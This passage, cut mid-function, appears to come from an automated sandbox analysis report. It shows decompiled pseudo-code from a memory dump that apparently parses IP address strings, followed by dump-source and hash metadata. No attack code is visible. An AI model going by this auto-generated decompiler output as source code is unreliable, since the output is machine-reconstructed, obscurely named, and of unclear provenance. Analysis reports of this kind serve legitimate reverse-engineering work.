                                                              								if(_t122 > 0xff) {
                                                              									goto L29;
                                                              								}
                                                              								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                              								goto L19;
                                                              							}
                                                              						}
                                                              						L21:
                                                              						if(_v8 > 7 || _t167 >= 0x80) {
                                                              							break;
                                                              						} else {
                                                              							if(E0204685D(_t167, 4) == 0) {
                                                              								if(E0204685D(_t167, 0x80) != 0) {
                                                              									if(_v12 > 0) {
                                                              										break;
                                                              									}
                                                              									_t127 = 1;
                                                              									_a7 = 1;
                                                              									_v24 = _t164;
                                                              									_v20 = 1;
                                                              									_v16 = 1;
                                                              									L36:
                                                              									if(_v20 == _t127) {
                                                              										goto L19;
                                                              									}
                                                              									_t158 = 0;
                                                              									goto L14;
                                                              								}
                                                              								break;
                                                              							}
                                                              							_a7 = 0;
                                                              							_v24 = _t164;
                                                              							_v20 = 1;
                                                              							_v16 = 1;
                                                              							goto L19;
                                                              						}
                                                              					}
                                                              					_t130 = _t118 - 1;
                                                              					if(_t130 != 0) {
                                                              						if(_t130 == 1) {
                                                              							goto L21;
                                                              						}
                                                              						_t127 = 1;
                                                              						goto L36;
                                                              					}
                                                              					if(_t167 >= 0x80) {
                                                              						L7:
                                                              						if(_t167 == 0x3a) {
                                                              							_t158 = 0;
                                                              							if(_v12 > 0 || _v8 > 6) {
                                                              								break;
                                                              							} else {
                                                              								_t119 =  &(_t164[1]);
                                                              								if( *_t119 != _t167) {
                                                              									_v8 = _v8 + 1;
                                                              									L13:
                                                              									_v20 = _t158;
                                                              									goto L14;
                                                              								}
                                                              								if(_v28 != 0) {
                                                              									break;
                                                              								}
                                                              								_v28 = _v8 + 1;
                                                              								_t143 = 2;
                                                              								_v8 = _v8 + _t143;
                                                              								goto L47;
                                                              							}
                                                              						}
                                                              						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                              							break;
                                                              						} else {
                                                              							_v12 = _v12 + 1;
                                                              							_t158 = 0;
                                                              							goto L13;
                                                              						}
                                                              					}
                                                              					if(E0204685D(_t167, 4) != 0) {
                                                              						_v16 = _v16 + 1;
                                                              						goto L19;
                                                              					}
                                                              					if(E0204685D(_t167, 0x80) != 0) {
                                                              						_v16 = _v16 + 1;
                                                              						if(_v12 > 0) {
                                                              							break;
                                                              						}
                                                              						_a7 = 1;
                                                              						goto L19;
                                                              					}
                                                              					goto L7;
                                                              				}
                                                              				 *_a8 = _t164;
                                                              				if(_v12 != 0) {
                                                              					if(_v12 != 3) {
                                                              						goto L29;
                                                              					}
                                                              					_v8 = _v8 + 1;
                                                              				}
                                                              				if(_v28 != 0 || _v8 == 7) {
                                                              					if(_v20 != 1) {
                                                              						if(_v20 != 2) {
                                                              							goto L29;
                                                              						}
                                                              						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                              						L65:
                                                              						_t105 = _v28;
                                                              						if(_t105 != 0) {
                                                              							_t98 = (_t105 - _v8) * 2; // 0x11
                                                              							E02028980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                              							_t110 = 8;
                                                              							E0201DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                              						}
                                                              						return 0;
                                                              					}
                                                              					if(_v12 != 0) {
                                                              						if(_v16 > 3) {
                                                              							goto L29;
                                                              						}
                                                              						_t114 = E0204EE02(_v24, 0, 0xa);
                                                              						_t170 = _t170 + 0xc;
                                                              						if(_t114 > 0xff) {
                                                              							goto L29;
                                                              						}
                                                              						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                              						goto L65;
                                                              					}
                                                              					if(_v16 > 4) {
                                                              						goto L29;
                                                              					}
                                                              					_t115 = E0204EE02(_v24, 0, 0x10);
                                                              					_t170 = _t170 + 0xc;
                                                              					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                              					goto L65;
                                                              				} else {
                                                              					goto L29;
                                                              				}
                                                              			}


                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID:
                                                              • API String ID: 3965848254-0
                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction ID: f43cf34e722000989ec3a8c4b396f0380e7496f1627bed7426020a09e66b15ba
                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction Fuzzy Hash: 3991ADB1D0031AEEDF25CF9AC8486EEBBF5FB41309F20C0BAD405A6551EB705A41EB95
                                                              Uniqueness
                                                              Uniqueness Score: -1.00%